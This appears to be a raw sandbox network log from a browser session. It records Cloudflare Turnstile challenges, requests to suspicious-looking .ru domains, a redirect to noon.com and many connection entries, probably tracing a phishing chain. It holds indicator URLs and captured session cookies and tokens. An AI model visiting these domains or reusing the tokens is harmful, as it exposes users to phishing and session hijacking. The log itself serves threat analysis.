Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jxw27/0x4AAAAAAAicAxRArJzeiy3v/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 9wetjda.niavereinho.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://9wetjda.niavereinho.ru/QTnArt4/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjZiRnNtZGtDMWxSUUw4YmVUVUtsSGc9PSIsInZhbHVlIjoicjduYlRSWjlrUFB6WGNkR1BZazBWRXpZV21DTDhsZnBOSVVraVFsMVZnazVrNWFVTXorTEova2dpSmQ3NVQ5bmthN09JUDMxc1ZDck92WUF4ejJRb2k4K0c1ZjBCUWJ1STBwZitPZURJQ0NENXF6RjZ4Qml2eldya3BERi9qQmYiLCJtYWMiOiJlOTI2MDkzYWI1MzUxNDYyNDBjYmUwMWMzZjIxOTc3ZjAxZGUwYjkzMTY5ZGM2MTU1N2IwOGI3MGEyZDA5ZGZkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InNVM0F1alNnK1hTVVhWbGNOWHZxNUE9PSIsInZhbHVlIjoiY01pdkxvbFJMU0tKWkdqTHhJSkhoQUdiVndSc3RLOGFZODRJd1dDWHhrRFhGZ2plMjBDeGVSSEhVcGpBdmVtMFN5MldmaGwwcEtHcndhVC9xUmpQbVBnTThKUGM4R1lKTFA0bkJKZG1LOU1sMGRSQUVUekN0TU9DTkcwbnErSW0iLCJtYWMiOiJhNzk0NjYwMzg1MjBkYWU3MDdmYzg5MGQ0NjFhZGM2MmM5MTQwMmVmZTAxMDAzMzUyOWExM2JkOGYwZTcyYTYzIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cd56b4bca50423a&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/868862447:1728044727:Gz7Dl8mZdZr0DP9Q4Zh7hrsdOMaLwCsED9HAlqQ_3D4/8cd56b4bca50423a/c1fc4ecc24bba50 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8cd56b4bca50423a/1728047501850/dKqrmOItVOoeN4w HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jxw27/0x4AAAAAAAicAxRArJzeiy3v/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8cd56b4bca50423a/1728047501850/dKqrmOItVOoeN4w HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8cd56b4bca50423a/1728047501852/f96dfdf1476db5c1c12c75ca405306e993064662438dbaa062225451bc879712/HnD5w_lm3dPB86M HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jxw27/0x4AAAAAAAicAxRArJzeiy3v/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/868862447:1728044727:Gz7Dl8mZdZr0DP9Q4Zh7hrsdOMaLwCsED9HAlqQ_3D4/8cd56b4bca50423a/c1fc4ecc24bba50 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/868862447:1728044727:Gz7Dl8mZdZr0DP9Q4Zh7hrsdOMaLwCsED9HAlqQ_3D4/8cd56b4bca50423a/c1fc4ecc24bba50 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rreozoythcvyficrHTcllUWRLKOTPFRJKMWZZBRXQBHXTDTWYQN HTTP/1.1Host: wgqe7vkgoahs84cyd22bjy2ejwoyyvjyphrjtoyny5kmdunzf1munrjcw1b.transenil.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://9wetjda.niavereinho.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://9wetjda.niavereinho.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: noon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://9wetjda.niavereinho.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rreozoythcvyficrHTcllUWRLKOTPFRJKMWZZBRXQBHXTDTWYQN HTTP/1.1Host: wgqe7vkgoahs84cyd22bjy2ejwoyyvjyphrjtoyny5kmdunzf1munrjcw1b.transenil.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=CuYWk7mCX1vLgvr&MD=ATD2E8nm HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /client/config?cc=CH&setlang=en-CH HTTP/1.1X-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateAccept-Encoding: gzip, deflateX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-UserAgeClass: UnknownX-BM-Market: CHX-BM-DateFormat: dd/MM/yyyyX-Device-OSSKU: 48X-BM-DTZ: -240X-DeviceID: 01000A4109009A83X-BM-WindowsFlights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75X-Search-TimeZone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard TimeX-BM-Theme: 000000;0078d7X-Search-RPSToken: t%3DEwDoAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXFbfVe69dIZwHZLfOs%2BLxlMjYOWBawJ46X0VeEjzEp19o0BWzNWuo8i2psU40/5QmPKmWqzyVi/RmKvvIJiejyQDJFlgL9gQh72QLL%2BGp8SFz8TuM2y3QdJ5hEpqER1uN3h7790PAp513hxNXU7anDjWONUApXZfkrAPkYVi1T7sgLCmAA6yP8ZBeWXdgF7sWHxDEJubHTApa/k3bztoTrPfy631oa70zBsO9elyv3R9fU8Oj9GjwHA2%2BPiML5qSZlnGgQbrXMJLjO80IndpuUGQquMzd29X9geHCDszAGw5r3QaNoYYg7WvPKHo5TeVSXcry07Ovzk07Rl5epm1zgQZgAAEIPgQoUR904eLer6TsLq8DewARtA0Mbn2iJZz4oaGZ0r6q00D53DbJlArj4m2kd4H7IrQStqgCC4GxgHpE2Ko/nL0GR0h9PxupHAHXg8qOM3VICyjAn9yFaQPyN8%2B/TCA4AcWZcQyiZcl4l0JFQ4ACgi5oZ9AdTOxcjw%2BzbhJKhfRj%2BhwpZg9RviwWXiHfzwShdA0nWRdpjJ8Q99YqyTHmoTRxnvV73nT9K9YOlrglYBiUIuFdg0aCVfjxohOY%2Bdcc%2B6WcoBQOKzvVLpRH2Sea0ASKHLJ%2Br/F370430k/gyDl/rKa12lYz0S1vZyNYgSWYgPgO6NTw5mfgjGr9gu9BnfKjacbgtske7T7FlPHX2Rj4vYqVZoljszJxnki7dVDtYzYZK3nD9/4QoHjtRm0XQh5%2B3I%2BWVW06rSYG1Z9t9UZ7EacEz/2JD98wx/9%2BaJBCu5dc2iMdUHjo1oDrdz2fa3mkIRXsX75Nh4Kv/J%2BZ3iPE9/%2BI8pqNuEdLhJ3CXRDCYd5Cq%2BlO%2BzvciED8IsKswfuLFQZC0nSdaaAgnuGyBQW2sG6Qde29ngkFUc4NKVGF2AGVC1WhZdLmHNKnkhj6qP/dcB%26p%3DX-Agent-DeviceId: 01000A4109009A83X-BM-CBT: 1728047520User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045X-Device-isOptin: falseAccept-language: en-GB, en, en-USX-Device-Touch: falseX-Device-ClientSession: 578B137560FC45709C3F28278275A5C7X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIHost: www.bing.comConnection: Keep-AliveCookie: SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=3a628620&IPMID=1707317755885; MUID=5047E5942BB2460EA35B53CCF78DDB3D; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global trafficDNS traffic detected: DNS query: dtnyxe.member365.com
Source: global trafficDNS traffic detected: DNS query: hollandco.athrikasih.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: global trafficDNS traffic detected: DNS query: 9wetjda.niavereinho.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: wgqe7vkgoahs84cyd22bjy2ejwoyyvjyphrjtoyny5kmdunzf1munrjcw1b.transenil.ru
Source: global trafficDNS traffic detected: DNS query: noon.com
Source: global trafficDNS traffic detected: DNS query: www.noon.com
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/786006458:1728044719:U-h0t91PTgLDBIoHLkW1c4DQoh4-3OGX1NMhUHSThFI/8cd56adf1e4c7ce7/c6eaeb7329255dd HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 2919sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: c6eaeb7329255ddsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/x2cq0/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 04 Oct 2024 13:11:25 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 04 Oct 2024 13:11:25 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: ucxcG1PTqsf+j/LdHVAurPXJh7Ee7BNY4H4=$8+Tdv71uiyAdP1GhServer: cloudflareCF-RAY: 8cd56aefbb5bc351-EWR
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 04 Oct 2024 13:11:28 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: jURCPbR+ymPyoPSYu8/3U0yUEK6KuFtBcw8=$1woyMl80jmkMWjn8Server: cloudflareCF-RAY: 8cd56b034e4bde94-EWR
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 04 Oct 2024 13:11:32 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: a9xRtxgr7qIIfvm6p9GhGttZm9rqS8/yD60=$Pgxs/FZaBIPseeJAcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8cd56b1c0eea7cb2-EWR
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 04 Oct 2024 13:11:33 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 04 Oct 2024 13:11:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v8w%2Bvwhx1y4kU1skquzdEMq2sWfTrENkggTrFExr4oHFIp94bo7K1Fl9qSv2s93b4wEwr7AKizzf%2Bf7I8UKOO4IaN1DpaaRW9mxCk2rnDAtZ3fFQb01x2H%2FDRaFXMg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingSpeculation-Rules: "/cdn-cgi/speculation"CF-Cache-Status: HITAge: 8269Server: cloudflareCF-RAY: 8cd56b525e2a4397-EWR
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 04 Oct 2024 13:11:42 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: RC73Fj5dU4RRytac4KBjgBIjsjaUe3o8KtQ=$MujRfMV4ZMV961a7cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8cd56b5c6c3f7c93-EWR
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 04 Oct 2024 13:11:45 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: JKZYNklXl9Xldx8C3rbvEQmo8dnWw7Hmor0=$fcb97HyfDrm7dHeDcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8cd56b6f3e086a57-EWR
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 04 Oct 2024 13:11:49 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: Vd2veF7XUrenRDAHIpsr0CZkeVk8/0YpM1c=$JPfO3Mcg6OrxtEgdServer: cloudflareCF-RAY: 8cd56b864dc2c32a-EWR
Source: 77EC63BDA74BD0D0E0426DC8F80085060.2.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 2D85F72862B55C4EADD9E66E06947F3D0.2.drString found in binary or memory: http://x1.i.lencr.org/
Source: chromecache_227.6.drString found in binary or memory: https://9wETjDA.niavereinho.ru/QTnArt4/#D
Source: 012c37a5-07fe-4ba7-ac20-d719fa6787f4.tmp.3.dr, 14d17f72-c870-46b3-86cf-ca499a568070.tmp.3.drString found in binary or memory: https://chrome.cloudflare-dns.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52637
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52635
Source: unknownNetwork traffic detected: HTTP traffic on port 52653 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52636
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 52647 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52639
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52662 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52648
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52649
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52646
Source: unknownNetwork traffic detected: HTTP traffic on port 52650 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52647
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52640
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52641
Source: unknownNetwork traffic detected: HTTP traffic on port 52644 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52644
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52645
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52642
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52643
Source: unknownNetwork traffic detected: HTTP traffic on port 52665 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52659 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52659
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52657
Source: unknownNetwork traffic detected: HTTP traffic on port 52651 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52658
Source: unknownNetwork traffic detected: HTTP traffic on port 52645 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52651
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52652
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52650
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52655
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52656
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52653
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52654
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52639 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52664 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52658 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52656 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52662
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52660
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52661
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52666
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52664
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52665
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52642 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52636 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52670
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 52670 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52643 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52637 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52666 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52648 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52654 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52640 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52661 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52655 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52649 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52641 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52635 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52652 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52646 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52660 -> 443
